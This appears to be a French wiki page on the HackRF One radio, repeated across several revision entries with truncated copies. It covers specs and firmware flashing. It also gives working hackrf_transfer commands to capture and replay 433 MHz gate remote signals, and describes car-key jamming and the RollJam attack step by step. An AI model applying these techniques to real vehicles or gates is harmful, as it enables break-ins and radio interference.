*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par .bin.

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus.

Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU (DFU Boot).
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel .bin dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU (DFU Boot) n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, le HackRF One démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer le HackRF en mode DFU Boot (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté P2_8 sur la plupart des Jawbreaker mais peut être étiqueté 2 sur les prototypes. La broche 1 est étiquetée VCC. La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par .dfu, et non un micrologiciel se terminant par .bin.

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T15:55:04Z

OldNeib : /* Si nécessaire seulement: Récupération du SPI Flash Firmware */

== HackRF One ==
Le HackRF One ([https://greatscottgadgets.com/hackrf/one/ Great Scott Gadgets]) est une radio définie par logiciel (SDR) capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Il a été conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération.
Le HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par .bin.

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus.

Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU (DFU Boot).
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel .bin dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T15:52:58Z

OldNeib : /* Si nécessaire seulement: Récupération du SPI Flash Firmware */

== HackRF One ==
Le HackRF One ([https://greatscottgadgets.com/hackrf/one/ Great Scott Gadgets]) est une radio définie par logiciel (SDR) capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Il a été conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération.
Le HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par .bin.

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus.

Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU.
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel ".bin" dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

Vous ne devez utiliser qu'une image de micrologiciel dont le nom de fichier se termine par ".dfu" par DFU, et non un micrologiciel se terminant par ".bin".

=== Installer DFU-Util ===
$ apt install dfu-util

Depuis les [http://dfu-util.sourceforge.net/build.html sources]:
$ cd ~
$ sudo apt-get build-dep dfu-util
$ sudo apt-get install libusb-1.0-0-dev
$ git clone git://git.code.sf.net/p/dfu-util/dfu-util
$ cd dfu-util
$ ./autogen.sh
$ ./configure
$ make
$ sudo make install

=== Mise à jour du CPLD ===
Les anciennes versions du firmware du HackRF (prior to release 2021.03.1) nécessitent une étape supplémentaire pour programmer un flux binaire dans le CPLD.

Pour mettre à jour l'image du CPLD, mettez d'abord à jour le microprogramme flash SPI, libhackrf et hackrf-tools.

Ensuite :
$ hackrf_cpldjtag -x firmware/cpld/sgpio_if/default.xsvf

Trois LEDs devraient commencer à clignoter. Cela indique que le CPLD a été programmé avec succès.
Réinitialisez le dispositif en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

== Replay Attaque ==
=== Portail ===
Nous devons déterminer sur quelle fréquence la télécommande va communiquer (autours des 433Mhz).

Sur GQRX, nous allons pouvoir vérifier et ajuster notre fréquence d'écoute. Lorsque nous activons la télécommande, nous devons observer une variation du signal sur la fréquence écoutée.

==== Enregistrement ====
$ hackrf_transfer -s 2 -f 433000000 -r file

==== Émission ====
$ hackrf_transfer -s 2 -f 433000000 -t file -a 1 -x 24

==== Options ====
*-s : Taux d'echantillons en MHz
*-f : Fréquence exacte enregistrée ou diffusée en Hz
*-r : Nom du fichier à l'enregistrement
*-t : Nom du fichier à la lecture
*-a : Amplification
*-x : Gain entre 0 et 47 dB (en Décibel)
*-h : Pour le menu complet des options.

=== Talkie-walkie ===
Il s'agit exactement du même procédé vu ci-dessus pour les portail.

== Car Key Replay Attack ==
Pour ne pas que les voitures soit vulnérables à une attaque simple de Replay Attack, les constructeur ont équipé les nouvelles voitures d'un système de code roulant (rolling code system) chaque fois que vous appuyez sur le bouton de déverrouillage, la télécommande utilise un algorithme pour générer un nouveau code ce qui rend donc les ancien siganux inutilisables, un simple Replay Attack comme celui présenté ci-dessus n'est donc pas impossible.

=== Étude du signal avec URH ===
[https://github.com/jopohl/urh URH]

== Radio Jamming ==
Le jamming est une technique de brouillage visant à perturber les fréquences comportant des informations, en les submergeant avec du bruit. C'est le rapport signal sur bruit.

=== Jamming Car Key ===
En émettant du bruit sur la fréquence utilisé par une clé de voiture, le signal se retrouvera ainsi perdu et ne pourra ainsi pas être reconnu.

=== RollJam Attack ===
Méthodologie de l’attaque :
*Un brouillage radio est lancé sur la fréquence 433.92 qui est la fréquence de déverrouillage de notre voiture.
*La victime tente de déverrouiller une première fois la voiture en appuyant sur la clef, et donc en émettant un signal.
*Le signal est capturé et enregistré.
*La victime tente donc une deuxième fois de déverrouiller la voiture, toujours sans réussite.
*Le brouillage s’arrête et le premier signal est lancé ce qui déverrouille la voiture.

Le 2eme signal (Rolling Code) émis par la victime est enregistré. Comme la voiture a reçu uniquement le premier signal, le rolling code du second signal est donc valide, l'attaquant pourra donc déverrouiller la voiture par la suite.

=== Jamming Wifi ===

== Portapack ==

== SSTV ==

== Tempest SDR ==

== GPS Spoofing ==

== Références ==
*https://greatscottgadgets.com/hackrf/one/
*https://hackrf.readthedocs.io/en/latest/index.html
*https://github.com/PierreAdams/HackRF-One-French

Tools:HackRF One

2023-12-02T15:52:38Z

OldNeib : /* Si nécessaire seulement: Récupération du SPI Flash Firmware */

== HackRF One ==
Le HackRF One ([https://greatscottgadgets.com/hackrf/one/ Great Scott Gadgets]) est une radio définie par logiciel (SDR) capable d'émettre ou de recevoir des signaux radio de 1 MHz à 6 GHz.

Il a été conçu pour permettre le test et le développement de technologies radio modernes et de nouvelle génération.
Le HackRF One est un matériel open source qui peut être utilisée en tant que périphérique USB ou programmée pour un fonctionnement autonome.

*Fréquence de fonctionnement de 1 MHz à 6 GHz
*Émetteur-récepteur semi-duplex
*Jusqu'à 20 millions d'échantillons par seconde
*Échantillons en quadrature de 8 bits (8 bits I et 8 bits Q)
*Compatible avec GNU Radio, SDR#, etc.
*Gain RX et TX et filtre en bande de base configurables par logiciel
*Alimentation du port d'antenne contrôlée par logiciel (50 mA à 3,3 V)
*Connecteur d'antenne SMA femelle
*Entrée et sortie d'horloge SMA femelle pour la synchronisation
*Boutons pratiques pour la programmation
*En-têtes de broches internes pour l'expansion
*USB 2.0 haut débit
*alimenté par USB

=== Commandes ===
Hackrf_info : informations de version

Hackrf_transfer : capturer, transmettre

hackrf_debug : commande de debug du hackRF One

hackrf_sweep : balayer un champ de fréquences et l'analyser

hackrf_spiflash : mettre à jour le firmware

hackrf_cpldjtag : mettre à jour le cpld

== Installation ==
$ apt install hackrf

=== Mise à jour du micrologiciel ===
Les appareils HackRF sont livrés avec un micrologiciel sur la mémoire flash SPI. Le micrologiciel peut être mis à jour à l'aide d'un câble USB et d'un ordinateur hôte.

=== Mise à jour du SPI Flash Firmware ===
$ hackrf_spiflash -w hackrf_one_usb.bin

Vous pouvez trouver le binaire du firmware (hackrf_one_usb.bin) dans le répertoire firmware-bin de [https://github.com/mossmann/hackrf/releases/latest la dernière version] ou vous pouvez compiler le vôtre à partir [https://github.com/mossmann/hackrf/tree/master/firmware des sources]. Pour Jawbreaker, utilisez hackrf_jawbreaker_usb.bin. Si vous compilez à partir des sources, le fichier s'appellera hackrf_usb.bin.

Lorsque vous écrivez une image de micrologiciel sur la mémoire flash SPI, veillez à sélectionner un micrologiciel dont le nom de fichier se termine par .bin.

Après avoir écrit le micrologiciel sur la mémoire flash SPI, vous devrez peut-être réinitialiser le dispositif HackRF en appuyant sur le bouton RESET ou en le débranchant et en le rebranchant.

Si vous obtenez une erreur mentionnant HACKRF_ERROR_NOT_FOUND, il s'agit souvent d'un problème de permissions dans votre système d'exploitation.

Pour vérifier si la mise à jour a été correctement installée:
$ hackrf_info
hackrf_info version: unknown
libhackrf version: unknown (0.5)
Found HackRF
Index: 0
Serial number: 000000000000000057b068dc22451163
Board ID Number: 2 (HackRF One)
Firmware Version: 2018.01.1 (API:1.02)
Part ID Number: 0xa000cb3c 0x00724357

=== Si nécessaire seulement: Récupération du SPI Flash Firmware ===
Si le firmware installé dans la mémoire flash SPI a été endommagé ou si vous programmez un HackRF fait maison pour la première fois, vous ne pourrez pas utiliser immédiatement le programme hackrf_spiflash comme indiqué dans la procédure ci-dessus.

Suivez plutôt les étapes suivantes :
*Suivez les instructions de démarrage DFU pour démarrer le HackRF en mode de démarrage DFU.
*Tapez dfu-util --device 1fc9:000c --alt 0 --download hackrf_one_usb.dfu pour charger le micrologiciel d'une version dans la RAM. Si vous avez un Jawbreaker, utilisez hackrf_jawbreaker_usb.dfu à la place. Alternativement, utilisez make -e BOARD=HACKRF_ONE RUN_FROM=RAM pour charger le firmware en RAM et le démarrer.
*Suivez la procédure de mise à jour du micrologiciel SPI flash ci-dessus pour écrire l'image du micrologiciel ".bin" dans la mémoire flash SPI.

=== Si nécessaire seulement: DFU Boot ===
Le mode de démarrage DFU n'est normalement nécessaire que si le micrologiciel ne fonctionne pas correctement ou n'a jamais été installé.

Le microcontrôleur LPC4330 du HackRF est capable de démarrer à partir de plusieurs sources de code différentes. Par défaut, HackRF démarre à partir de la mémoire flash SPI (SPIFI). Il est également possible de démarrer HackRF en mode DFU (USB). En mode de démarrage DFU, le HackRF procède à une énumération via USB, attend que le code soit fourni à l'aide de la norme DFU (Device Firmware Update) via USB, puis exécute ce code à partir de la RAM. Le SPIFI est normalement inutilisé et non modifié en mode DFU.

Pour démarrer le HackRF One en mode DFU, maintenez le bouton DFU enfoncé tout en l'allumant ou en appuyant sur le bouton RESET et en le relâchant. Relâchez le bouton DFU lorsque le voyant 3V3 s'allume. Le voyant 1V8 doit rester éteint. À ce stade, le HackRF One est prêt à recevoir le micrologiciel par USB.

Pour démarrer le Jawbreaker en mode DFU, court-circuitez deux broches sur l'une des en-têtes "BOOT" lorsque l'alimentation est fournie pour la première fois. Les broches qui doivent être court-circuitées sont les broches 1 et 2 de l'en-tête P32 du Jawbreaker. L'en-tête P32 est étiqueté "P2_8" sur la plupart des Jawbreaker mais peut être étiqueté "2" sur les prototypes. La broche 1 est étiquetée "VCC". La broche 2 est la broche centrale. Après le démarrage DFU, vous devriez voir la LED VCC s'allumer et noter que la LED 1V8 ne s'allume pas. À ce stade, le Jawbreaker est prêt à recevoir un micrologiciel par USB.

